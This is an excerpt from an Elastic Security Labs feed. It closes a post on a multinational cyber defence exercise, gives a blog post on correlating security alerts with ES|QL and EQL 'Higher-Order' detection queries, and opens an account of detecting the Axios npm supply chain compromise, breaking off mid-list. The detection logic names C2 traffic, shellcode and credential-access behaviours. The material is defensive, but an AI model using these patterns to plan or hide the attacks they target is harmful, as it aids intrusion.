<p><strong>Year 4 (DCM26, formerly DCM5)</strong> - AWS came on board, providing Bedrock access for our AI agents and contributing funding towards the Elastic deployments. This was a significant milestone; having a hyperscaler directly invested in the exercise's success unlocked capabilities (such as compliant, UK-tenanted AI inference with full guardrails and audit logging) that simply wouldn't have been possible otherwise. Tines' integration this year was also enhanced by the addition of on-range access to LLMs. The DCM series also reached a milestone this year, transitioning from its origins as an Army Cyber Association initiative to an officially funded programme under Cyber and Specialist Operations Command.</p>
<p><strong>To the teams at Endace, Tines, and AWS - sincere thanks. This exercise is better because of your contributions, and all Teams are better equipped because of the platform we've built together. We're already planning for DCM27. Cheers to the lot of you.</strong></p>
<h2>Culture, highlights, and the bits that make it worthwhile</h2>
<h3>The Challenge Coins</h3>
<p>We had custom challenge coins minted for DCM26. If you know, you know, challenge coins are a long-standing military tradition, and having one made for the exercise felt like the right way to mark our fourth year of involvement.</p>
<h3>The cocktail party</h3>
<p>We were also grateful to be invited to the High Commission cocktail party hosted by the British High Commissioner to Singapore. There's something quite surreal about discussing Elasticsearch shard counts and Terraform state management whilst holding a gin and tonic at the ambassador's invitation. It was a brilliant evening, a genuine reminder that these exercises exist at the intersection of technology and diplomacy, and that the relationships built here extend well beyond the technical.</p>
<h2>Wrapping up</h2>
<p>The multi-tenanted architecture proved itself under sustained load; the native Elastic AI features (<a href="https://www.elastic.co/kr/elasticsearch/ai-assistant">AI Assistant</a> and <a href="https://www.elastic.co/kr/docs/solutions/security/ai/attack-discovery">Attack Discovery</a>) gave teams capabilities that would have been science fiction a few years ago; and the custom AI agents exceeded our expectations for adoption. The partnership model continues to demonstrate that industry involvement in defence exercises creates outcomes that no single organisation could achieve alone.</p>
<p>Defence Cyber Marvel 2026 was a landmark iteration of an exercise that continues to grow in ambition, complexity, and impact. For Elastic, being trusted to provide the core defensive security platform for 40 Blue Teams from 29 nations, and this year, the AI capability as well, is something we don't take lightly. The exercise develops real skills for real people who will go on to defend real networks, and being a part of that mission is genuinely meaningful.</p>
<p>As the <a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government's press release</a> put it, DCM demonstrates the practical value of real-life scenarios that reinforce international partnerships. We couldn't agree more.</p>
<p>We'll be back next year, and I suspect we'll have even more to talk about. In the meantime, we'll continue to improve the product so that support for environments such as Defence Cyber Marvel excels year over year.</p>
<p>See you on the range.</p>
<p>Follow the DCM26 story on social media:</p>
<p><a href="https://www.facebook.com/RSIGNALS/posts/last-week-defence-cyber-marvel-2026-based-in-singapore-brought-together-2500-par/1338105391677347/">Facebook</a> | <a href="https://www.linkedin.com/posts/uk-in-singapore_defence-cyber-marvel-2026pdf-activity-7426505462310752258-1aHq?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAABiQ31MBIbDwn5LYMrolM4rznGQcLabrY9A">LinkedIn</a> | <a href="https://www.instagram.com/p/DU00Y1jCKbr/">Instagram</a></p>
<h2>Further reading</h2>
<p><em>Elastic Security &amp; AI</em></p>
<ul>
<li><a href="https://www.elastic.co/kr/security-labs">Elastic Security</a> - The platform powering the Blue Team deployments</li>
<li><a href="https://www.elastic.co/kr/elasticsearch/ai-assistant">AI Assistant for Security</a> - Context-aware AI chat within Elastic Security</li>
<li><a href="https://www.elastic.co/kr/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> - LLM-powered alert correlation and threat narrative generation</li>
<li><a href="https://www.elastic.co/kr/docs/explore-analyze/ai-features/elastic-agent-builder">Agent Builder</a> - Framework for building custom AI agents with Elasticsearch</li>
</ul>
<p><em>Infrastructure &amp; Tooling</em></p>
<ul>
<li><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform Provider</a> - Infrastructure as Code for the Elastic Stack</li>
<li><a href="https://www.elastic.co/kr/docs/reference/fleet">Elastic Fleet Guide</a> - Centrally managing Elastic Agents at scale</li>
<li><a href="https://github.com/ClarifiedSecurity/catapult">Catapult by Clarified Security</a> - Ansible-based cyber range provisioning</li>
</ul>
<p><em>Exercise Context</em></p>
<ul>
<li><a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government DCM26 Press Release</a> - Official overview of the exercise</li>
</ul>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/elastic-defence-cyber-marvel.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Prioritizing Alerts Triage with Higher-Order Detection Rules]]></title>
            <link>https://www.elastic.co/kr/security-labs/higher-order-detection-rules</link>
            <guid>higher-order-detection-rules</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Scaling SOC efficiency through multi-signal correlation and higher-order detection patterns.]]></description>
            <content:encoded><![CDATA[<p>At Elastic, we operate a large and diverse set of behavior detection rules across multiple datasets, environments, and severity levels. Most of these rules are atomic, each designed to detect a specific behavior, signal, or attack pattern. In addition, we ingest and promote <a href="https://github.com/elastic/detection-rules/tree/main/rules/promotions">external alerts</a> from security integrations such as firewalls, EDR, WAF, and other security controls.</p>
<p>The result is powerful visibility but also significant alert volume. From our telemetry, even when considering only non <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/about-building-block-rules">Building Block Rules</a>, <strong>65</strong> unique detection rules generate nearly <strong>8000 alerts per day per production cluster</strong>. Analyzing each alert in isolation is neither scalable nor cost-effective.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image6.png" alt="" /></p>
<p>This is where <strong>Higher-Order Rules</strong> come into play.</p>
<p><a href="https://github.com/search?q=repo%3Aelastic%2Fdetection-rules++%22Rule+Type%3A+Higher-Order+Rule%22+path%3A%2F%5Erules%5C%2F%2F&amp;type=code">Higher-order</a> rules do not detect a single behavior. Instead, they correlate related alerts over time, across data sources, or within a shared context (such as host, user, IP, or process). By grouping signals into meaningful patterns, we can prioritize what truly matters and reduce the need for deep, expensive analysis on every individual alert whether performed manually, automated, or augmented by AI.</p>
<p>In this blog, we’ll walk through our approach to building Higher-Order Rules in Elastic, share practical examples, and highlight key lessons learned along the way.</p>
<h2>What Are Higher-Order Rules?</h2>
<p>Higher-Order Rules (HOR) are detections that use <strong>alerts as input</strong>, either correlating alerts with other alerts (alert-on-alert) or combining alerts with additional data such as raw events, metrics, or contextual telemetry.</p>
<p>Unlike atomic rules that detect a single behavior, Higher-Order Rules identify patterns across signals. Their purpose is not to replace base detections, but to elevate combinations of findings that are more likely to represent real attack activity. In practice, they surface higher-confidence findings and improve triage prioritization. Higher-Order rules are designed to work alongside <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/about-building-block-rules">Building Block Rules</a>. Building block rules generate alerts that do not appear in the default alerts view, reducing noise while still feeding correlated detections. Many of the base rules referenced in this article can be also configured as building block rules, so that only Higher-Order correlations surface for analyst review.</p>
<p>The core insight is that independent detections converging on the same entity compound confidence, where each additional signal multiplies the likelihood that the activity is real, not benign.These three design principles operationalize that insight:</p>
<h3>1. Entity-Based Correlation</h3>
<p>Rules correlate activity by shared entities such as host, user, source IP, destination IP, or process - allowing analysts to quickly see when multiple findings converge on the same asset or identity.</p>
<h3>2. Cross–Data Source Visibility</h3>
<p>Some rules operate within a single integration (for example, endpoint-only detections from Elastic Defend or third-party EDR). Others intentionally combine signals across domains endpoint with network (PANW, FortiGate, Suricata), endpoint with email, or endpoint with system metrics to capture multi-stage or cross-surface activity.</p>
<h3>3. Time and Prevalence Awareness</h3>
<p>Temporal logic plays a key role.</p>
<p>Newly observed rules highlight the first occurrence of a given alert within a defined lookback window (for example, five days), ensuring that even a single rare alert is surfaced for review.</p>
<p>Prevalence-based logic (such as using INLINE STATS) filters for alerts that occur on only a small number of hosts globally, helping reduce noise and emphasize anomalous behavior.</p>
<p>The full set of Higher-Order Rules spans endpoint-only correlations, cross-domain detections (endpoint + network, endpoint + email), lateral movement patterns (for example, <code>alert_1 host.ip = alert_2 source.ip</code>), ATT&amp;CK-aligned groupings (single or multi-tactic activity), newly observed alerts, and alert-to-event correlation (such as alerts combined with abnormal CPU metrics). The following sections walk through representative examples from these categories.</p>
<h2>Correlation and Newly Observed Higher-Order Rules</h2>
<p>In practice, high-risk activity does not always look the same.</p>
<p>Sometimes compromise reveals itself through <strong>multiple converging signals</strong>. Other times, it appears as a <strong>single alert that has never been seen before</strong>.</p>
<p>To handle both realities, we organize our Higher-Order Rules into three complementary patterns:</p>
<ul>
<li><strong>Correlation rules</strong> multiple alerts or events linked to a shared entity (host, user, IP, or process).</li>
<li><strong>Newly observed rules</strong> a single alert that is rare or first-seen within a defined time window.</li>
<li><strong>Hybrid patterns</strong> combining correlation with first-seen logic, which can further elevate suspicion and surface particularly interesting activity.</li>
</ul>
<p>Correlation rules raise confidence through signal density and diversity: when several independent detections point to the same entity, the likelihood of real malicious activity increases.</p>
<p>Newly observed rules address the opposite case, low volume but high novelty. They prioritize alerts based on rarity over time, ensuring that first-time or highly unusual detections are not overlooked simply because they occur once.</p>
<p>Together, these approaches form the foundation of an efficient and scalable triage strategy.</p>
<p>Let’s dive into examples and explore the differences, strengths, and trade-offs of each pattern.</p>
<h3>Endpoint Alerts Correlation</h3>
<p>A significant portion of real-world attack discovery comes from endpoint telemetry. It provides rich context process activity, command lines, file behavior, and user actions making it one of the most powerful detection sources.</p>
<p>At the same time, endpoint environments are dynamic. Legitimate software, admin tools, and third-party applications (and recently GenAI endpoint utilities 🥲) can generate high alert volume and false positives, requiring continuous tuning.</p>
<p>Higher-Order correlation helps address this by shifting the focus from individual alerts to <strong>multiple distinct signals on the same host or process</strong> increasing confidence while reducing unnecessary investigation effort.</p>
<p>The following ES|QL query triggers when there are 3 unique Elastic Defend behavior rules OR alerts from different features (e.g. one shellcode_thread with behavior, malicious_file with behavior) OR more than 2 malware alerts in a 24h time Window from the same host:</p>
<pre><code>from logs-endpoint.alerts-* metadata _id
| eval day = DATE_TRUNC(24 hours, @timestamp)
| where event.code in (&quot;malicious_file&quot;, &quot;memory_signature&quot;,  &quot;shellcode_thread&quot;, &quot;behavior&quot;) and 
 agent.id is not null and not rule.name in (&quot;Multi.EICAR.Not-a-virus&quot;)
| stats Esql.alerts_count = COUNT(*),
        Esql.event_code_distinct_count = count_distinct(event.code),
        Esql.rule_name_distinct_count = COUNT_DISTINCT(rule.name),
        Esql.file_hash_distinct_count = COUNT_DISTINCT(file.hash.sha256),
        Esql.process_entity_id_distinct_count = COUNT_DISTINCT(process.entity_id) by host.id, day
| where (Esql.event_code_distinct_count &gt;= 2 or Esql.rule_name_distinct_count &gt;= 3 or Esql.file_hash_distinct_count &gt;= 2)
</code></pre>
<p>To further raise suspicion, we can also correlate Elastic Defend alerts that belong to the same process tree:</p>
<pre><code>from logs-endpoint.alerts-*
| where event.code in (&quot;malicious_file&quot;, &quot;memory_signature&quot;, &quot;shellcode_thread&quot;, &quot;behavior&quot;) and
        agent.id is not null and not rule.name in (&quot;Multi.EICAR.Not-a-virus&quot;) and process.Ext.ancestry is not null

// aggregate alerts by process.Ext.ancestry and agent.id
| stats Esql.alerts_count = COUNT(*),
        Esql.rule_name_distinct_count = COUNT_DISTINCT(rule.name),
        Esql.event_code_distinct_count = COUNT_DISTINCT(event.code),
        Esql.process_id_distinct_count = COUNT_DISTINCT(process.entity_id),
        Esql.message_values = VALUES(message),
   ... by process.Ext.ancestry, agent.id

// filter for at least 3 unique process IDs and 2 or more alert types or rule names.
| where Esql.process_id_distinct_count &gt;= 3 and (Esql.rule_name_distinct_count &gt;= 2 or Esql.event_code_distinct_count &gt;= 2)

// keep unique values
| stats Esql.alert_names = values(Esql.message_values),
        Esql.alerts_process_cmdline_values = VALUES(Esql.process_command_line_values),
... by agent.id
| keep Esql.*, agent.id
</code></pre>
<p>Example of matches:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image9.png" alt="" /></p>
<p>To complement our coverage, we will need to also look for rare atomic ones.  The following ES|QL is designed to run on a 10-minute schedule with a 5 or 7 day lookback window. The lookback aggregates all alerts by rule name over the full window to compute first-seen time. The final filter (<code>Esql.recent &lt;= 10</code>) ensures only rules whose first-seen time falls within with current 10-minute execution window are surfaced, effectively detecting the moment a rule fires for the first time in the lookback period. This surfaces both rare false positives and stealthy behaviors that might otherwise be lost in volume:</p>
<pre><code>from logs-endpoint.alerts-*
| WHERE event.code == &quot;behavior&quot; and rule.name is not null
| STATS Esql.alerts_count = count(*),
        Esql.first_time_seen = MIN(@timestamp),
        Esql.last_time_seen = MAX(@timestamp),
        Esql.agents_distinct_count = COUNT_DISTINCT(agent.id),
        Esql.process_executable = VALUES(process.executable),
        Esql.process_parent_executable = VALUES(process.parent.executable),
        Esql.process_command_line = VALUES(process.command_line),
        Esql.process_hash_sha256 = VALUES(process.hash.sha256),
        Esql.host_id_values = VALUES(host.id),
        Esql.user_name = VALUES(user.name) by rule.name
// first time seen in the last 5 days - defined in the rule schedule Additional look-back time
| eval Esql.recent = DATE_DIFF(&quot;minute&quot;, Esql.first_time_seen, now())
// first time seen is within 10m of the rule execution time
| where Esql.recent &lt;= 10 and Esql.agents_distinct_count == 1 and Esql.alerts_count &lt;= 10 and (Esql.last_time_seen == Esql.first_time_seen)
// Move single values to their corresponding ECS fields for alerts exclusion
| eval host.id = mv_min(Esql.host_id_values)
| keep host.id, rule.name, Esql.*
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image7.png" alt="" /></p>
<p>The same <a href="https://github.com/elastic/detection-rules/blob/d358641c452dc0af5ab85d02f6f8948ec57c7ab9/rules/cross-platform/multiple_external_edr_alerts_by_host.toml#L16">logic</a> can be applied to an <a href="https://github.com/elastic/detection-rules/blob/main/rules/promotions/external_alerts.toml#L27">External Alert</a> from other third party EDRs:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image2.png" alt="" /></p>
<h3>Endpoint with Network Alerts Correlation</h3>
<p>A powerful detection approach is correlating endpoint alerts with network alerts. This helps answer the key question:</p>
<p><strong>Which process triggered this network alert?</strong></p>
<p>Network alerts alone often lack process context, such as which user or executable initiated the activity. By combining network alerts with endpoint telemetry (EDR data), you can enrich alerts with:</p>
<ul>
<li>Process name and hash</li>
<li>Command line and parent process</li>
<li>User and device information</li>
</ul>
<p>The following query correlates any Elastic Defend alert with suspicious events from network security devices such as Palo Alto Networks (PANW) and Fortinet FortiGate. The join key is the IP address: for network alerts, this is <code>source.ip</code>, for endpoint alerts, it is <code>host.ip</code>. The query normalizes these into a single field using <code>COALESCE</code>, enabling correlation across data sources that use different field names for the same entity. This may indicate that this host is compromised and triggering multi-datasource alerts.</p>
<pre><code>FROM logs-* metadata _id
| WHERE 
 (event.module == &quot;endpoint&quot; and event.dataset == &quot;endpoint.alerts&quot;) or
 (event.dataset == &quot;panw.panos&quot; and event.action in (&quot;virus_detected&quot;, &quot;wildfire_virus_detected&quot;, &quot;c2_communication&quot;, ...)) or
 (event.dataset == &quot;fortinet_fortigate.log&quot; and (...)) or
 (event.dataset == &quot;suricata.eve&quot; and message in (&quot;Command and Control Traffic&quot;, &quot;Potentially Bad Traffic&quot;, ...))
| eval 
      fw_alert_source_ip = CASE(event.dataset in (&quot;panw.panos&quot;, &quot;fortinet_fortigate.log&quot;), source.ip, null),
      elastic_defend_alert_host_ip = CASE(event.module == &quot;endpoint&quot; and event.dataset == &quot;endpoint.alerts&quot;, host.ip, null)
| eval Esql.source_ip = COALESCE(fw_alert_source_ip, elastic_defend_alert_host_ip)
| where Esql.source_ip is not null
| stats Esql.alerts_count = COUNT(*),
        Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),
        Esql.message_values_distinct_count = COUNT_DISTINCT(message),
        ... by Esql.source_ip
| where Esql.event_module_distinct_count &gt;= 2 AND Esql.message_values_distinct_count &gt;= 2
| eval concat_module_values = MV_CONCAT(Esql.event_module_values, &quot;,&quot;)
| where concat_module_values like &quot;*endpoint*&quot;
</code></pre>
<p>Example of matches correlating Elastic Defend and Fortigate alerts where the source.ip of the FortiGate alert is equal to the host.ip of the Elastic Defend endpoint alert :</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image3.png" alt="" /></p>
<p>The following EQL query correlates Suricata alerts with Elastic Defend network events to provide context about the source process and host:</p>
<pre><code>sequence by source.port, source.ip, destination.ip with maxspan=5s
// Suricata severithy 3 corresponds to information alerts, which are excluded to reduce noise
[network where event.dataset == &quot;suricata.eve&quot; and event.kind == &quot;alert&quot; and  event.severity != 3 and source.ip != null and destination.ip != null]
[network where event.module == &quot;endpoint&quot; and event.action in  (&quot;disconnect_received&quot;, &quot;connection_attempted&quot;)]
</code></pre>
<p>Example of matches confirming the Suricata alert and linking it to the target web server process nginx from Elastic Defend events confirming the web-exploitation attempt:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image8.png" alt="" /></p>
<h3>Endpoint Security with Observability</h3>
<p>Correlating observability telemetry with security alerts is a powerful detection strategy.</p>
<p>The <a href="https://en.wikipedia.org/wiki/XZ_Utils_backdoor">XZ</a> Utils backdoor incident demonstrated that security-relevant anomalies may first surface as performance regressions rather than traditional security alerts. In that case, unusual behavior in the SSH daemon led to deeper investigation and eventual discovery of malicious code.</p>
<p>This highlights an important principle: <strong>operational anomalies can be early indicators of compromise.</strong></p>
<p>With the <a href="https://www.elastic.co/kr/docs/reference/integrations/system#metrics-reference">Elastic Agent</a>, system metrics such as CPU and memory utilization can be collected alongside security telemetry. By correlating abnormal resource spikes with SIEM alerts either by process or by host we can increase detection confidence and surface high-risk activity earlier.</p>
<p>For example, an ES|QL correlation rule can identify a process exhibiting sustained 70% CPU utilization that is also the source of a memory signature alert for a cryptominer from Elastic Defend. Individually, each signal may be low or medium severity. Correlated together, they represent high-confidence malicious activity.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image1.png" alt="" /></p>
<p>We developed <strong>over 30 Higher-Order detections</strong> covering various types of relationships. While we can’t cover all of them here, the links below provide <strong>enough context to adapt these rules to your environment</strong>:</p>
<p>Endpoint Alerts:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_edr_elastic_defend_by_host.toml#L16">Multiple Elastic Defend Alerts by Agent</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_edr_elastic_same_process_tree.toml#L16">Multiple Elastic Defend Alerts from a Single Process Tree</a><br />
<a href="https://github.com/elastic/detection-rules/blob/6a7c1e96749fd5c2fc8801da747f4e29d18150a1/rules/cross-platform/multiple_elastic_defend_behavior_rules_same_host_prevalence.toml#L19">Multiple Rare Elastic Defend Behavior Rules by Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_elastic_defend_alert.toml#L17">Newly Observed Elastic Defend Behavior Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_external_edr_alerts_by_host.toml#L16">Multiple External EDR Alerts by Host</a></p>
<p>Endpoint and Network:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_panos_alert.toml#L17">Newly Observed Palo Alto Network Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_suricata_alert.toml#L17">Newly Observed High Severity Suricata Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_socks_fortigate_endpoint.toml#L19">FortiGate SOCKS Traffic from an Unusual Process</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml#L17">PANW and Elastic Defend - Command and Control Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_elastic_defend_netsecurity_by_host.toml#L18">Elastic Defend and Network Security Alerts Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml#L17">Suricata and Elastic Defend Network Correlation</a></p>
<p>Generic by MITRE ATT&amp;CK:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_risky_host_esql.toml#L17">Alerts in Different ATT&amp;CK Tactics by Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_same_tactic_by_host.toml#L18">Multiple Alerts in Same ATT&amp;CK Tactic by Host</a></p>
<p>Generic multi-integrations correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_srcip.toml#L17">Alerts From Multiple Integrations by Source Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_dstip.toml#L17">Alerts From Multiple Integrations by Destination Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_from_different_modules_by_user.toml#L17">Alerts From Multiple Integrations by User Name</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_elastic_detection_rule.toml#L17">Newly Observed High Severity Detection Alert</a></p>
<p>Lateral movement correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/multiple_alerts_by_host_ip_and_source_ip.toml">Suspected Lateral Movement from Compromised Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/lateral_movement_multi_alerts_new_srcip.toml#L15">Lateral Movement Alerts from a Newly Observed Source Address</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/lateral_movement_multi_alerts_new_userid.toml#L16">Lateral Movement Alerts from a Newly Observed User</a></p>
<p>Observability and security correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_alert_from_a_process_with_cpu_spike.toml#L17">Detection Alert on a Process Exhibiting CPU Spike</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_alerts_on_host_with_cpu_spike.toml#L17">Multiple Alerts on a Host Exhibiting CPU Spike</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/impact_newly_observed_process_with_high_cpu.toml#L18">Newly Observed Process Exhibiting High CPU Usage</a></p>
<p>Machine Learning correlation:<br />
<a href="https://github.com/elastic/detection-rules/blob/d358641c452dc0af5ab85d02f6f8948ec57c7ab9/rules/cross-platform/multiple_machine_learning_jobs_by_entity.toml#L16">Multiple Machine Learning Alerts by Influencer Field</a></p>
<p>Other correlation ideas:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_vulnerabilities_wiz_by_container.toml#L18">Multiple Vulnerabilities by Asset via Wiz</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml#L17">Elastic Defend and Email Alerts Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml#L23">Suspicious Kerberos Authentication Ticket Request</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/credential_access_multi_could_secrets_via_api.toml#L19">Multiple Cloud Secrets Accessed by Source Address</a></p>
<p>These examples illustrate how correlating alerts across endpoints, network, and observability can <strong>enrich context, accelerate investigations, and improve detection confidence</strong>.  We are actively expanding coverage in this area to support additional correlation scenarios.</p>
<p>You can enable them by filtering for the tag value Rule Type: Higher-Order Rule in the rules management page:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image4.png" alt="" /></p>
<p>Over a 15-day period, alert counts remained within acceptable volume (~30 alerts/day). Targeted tuning of initial outliers is expected to reduce them to ~20 alerts/day and materially improve overall signal quality.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image5.png" alt="" /></p>
<h3>Considerations and Trade-offs</h3>
<p>Higher-Order Rules introduce potential scheduling latency. Since they query alert indices, there is an inherent delay between when base alerts fire and when correlations surface. Rule scheduling intervals and loopback windows should be tuned to balance timeliness against performance cost. Additionally, HOR quality depends directly on the quality of the base detections. A noisy atomic rule will cascade false positives into every correlation that references it. We recommend tuning base rules aggressively before enabling dependent Higher-Order Rules. Finally, ESQL queries over broad index patterns (e.g. logs-*) can be expensive at scale. In high-volume environments, scoping index patterns to specific datasets or using dataviews can significantly reduce query cost.</p>
<h2>Conclusion</h2>
<p>High-Order rules are essential for prioritizing alert triage and managing alert volumes for automation and AI-driven analysis**.** When combined with <a href="https://www.elastic.co/kr/docs/solutions/security/advanced-entity-analytics/entity-risk-scoring">Entity Risk Scoring</a>, Higher-Order Rules can feed directly into host and user risk profiles, creating a quantitative prioritization layer that further reduces manual triage burden. In our production tests, the majority of these detections produced a medium to low alert volume, making them practical for real-world use. While a small number of noisy rules or false positives may initially surface, excluding these at the atomic rule level quickly leaves a robust set of high-value correlations.</p>
<p>To maximize their effectiveness, two operational practices are critical. First, ensure that input alerts use severity levels that accurately reflect both noise and real-world impact, cleaning and normalizing severity is foundational to meaningful correlation. Second, start small and expand deliberately: avoid trying to correlate every possible alert signal. Exclude inherently noisy tactics (such as discovery), deprioritize low-severity signals, and deprecate rules that disproportionately influence correlation outcomes.</p>
<p>Applied correctly, High-Order rules streamline investigations, improve detection accuracy, and significantly increase the efficiency and trustworthiness of modern security operations.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/higher-order-detection-rules.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[How we caught the Axios supply chain attack]]></title>
            <link>https://www.elastic.co/kr/security-labs/how-we-caught-the-axios-supply-chain-attack</link>
            <guid>how-we-caught-the-axios-supply-chain-attack</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Joe Desimone shares the story of how he caught the Axios supply chain attack with a proof of concept tool built in an afternoon.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Last Monday night I was working late and a Slack alert came in from a monitoring tool I had built three days earlier. Axios compromised; one of the most popular npm packages in the world.</p>
<p>My heart started racing, I knew every second mattered to respond and limit the damage. But honestly it was so crazy that I thought it must be a false positive. I checked and rechecked everything a few times even though it seemed very obviously malicious.</p>
<p>It wasn't a false positive. It was one of the largest supply chain compromises ever on npm, with presumed attribution to DPRK state actors. We caught it with a proof of concept I hacked together on a Friday afternoon, running on my laptop, powered by AI reading diffs.</p>
<p>I want to share the whole story. How we got here, what I built, and why I think sharing it openly makes everyone a little safer.</p>
<h2>I've been worried about supply chain for a while</h2>
<p>Some recent supply chain incidents have genuinely had me up at night. Supply chain compromise is a hard problem. At Elastic we have so many developers, and our security customers are trusting us to protect them. It has been clear that the status quo is broken, and we need some new technology or procedures to help. I had some ideas around a more trusted, AI-vetted ecosystem, building on app control principles while limiting cost and friction.</p>
<p>But the <a href="https://www.theregister.com/2026/03/30/telnyx_pypi_supply_chain_attack_litellm/">Trivy compromise</a> was really where I took notice. On March 19th, a group called TeamPCP compromised the <a href="https://github.com/aquasecurity/trivy-action">aquasecurity/trivy-action</a> GitHub Action (the one for the popular Trivy security scanner, yes, a security tool). They injected a credential stealer that harvested secrets from CI/CD pipelines. A massive amount of credentials were stolen.</p>
<p>That cascaded fast. On March 24th, <a href="https://docs.litellm.ai/blog/security-update-march-2026">LiteLLM got hit</a>. TeamPCP had stolen LiteLLM's PyPI publishing credentials through the poisoned Trivy pipeline, and used them to push malicious versions that were aggressive credential stealers. SSH keys, cloud creds, API keys, wallet data, everything.</p>
<p>LiteLLM is a package I had used myself. So you could say at that point I was fully &quot;up at night.&quot;</p>
<p>I knew that with all the credentials leaked from the Trivy breach, there was definitely going to be more. We needed to do something to stay ahead of it. Both for our customers and to protect Elastic.</p>
<h2>Friday, after the red-eye</h2>
<p>I had just flown back from <a href="https://www.rsaconference.com/">RSAC 2026</a> in San Francisco. Red-eye flight Thursday night. If you've done a red-eye after four days of conference, you know the state I was in. However, I was excited as ever for a new project, so I sat down and hammered out v0.0.1.</p>
<p>The idea: monitor changes as they get pushed to package repos. Run a diff to see what changed. Use AI/LLM to determine if the changes are malicious. That's basically it.</p>
<p>The pipeline looks like:</p>
<ol>
